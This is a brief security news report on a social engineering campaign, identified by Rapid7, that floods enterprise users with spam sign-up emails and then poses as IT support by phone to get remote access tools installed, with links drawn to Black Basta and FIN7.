Cybersecurity researchers at Rapid7 identified a social engineering campaign targeting enterprises with spam emails to gain initial access for further exploitation, The Hacker News reports.
Click for more special coverage
The main version of the ongoing campaign, which has been active since late April 2024, overwhelms users with legitimate newsletter sign-up confirmations to bypass email protection systems. The threat actors then impersonate the company's IT team, contacting users by phone to persuade them to install remote monitoring software like AnyDesk or Microsoft’s Quick Assist. Once remote access is established, attackers execute batch scripts to download additional payloads, including OpenSSH for Windows, creating a reverse shell to their command-and-control server. The campaign also attempts to deploy Cobalt Strike beacons, although one observed attempt failed.
This activity shows overlap with tactics previously associated with Black Basta ransomware operators. The campaign has also utilized remote monitoring tools such as ConnectWise ScreenConnect and the NetSupport RAT, a remote access trojan linked to FIN7, a cybercriminal group with connections to Black Basta.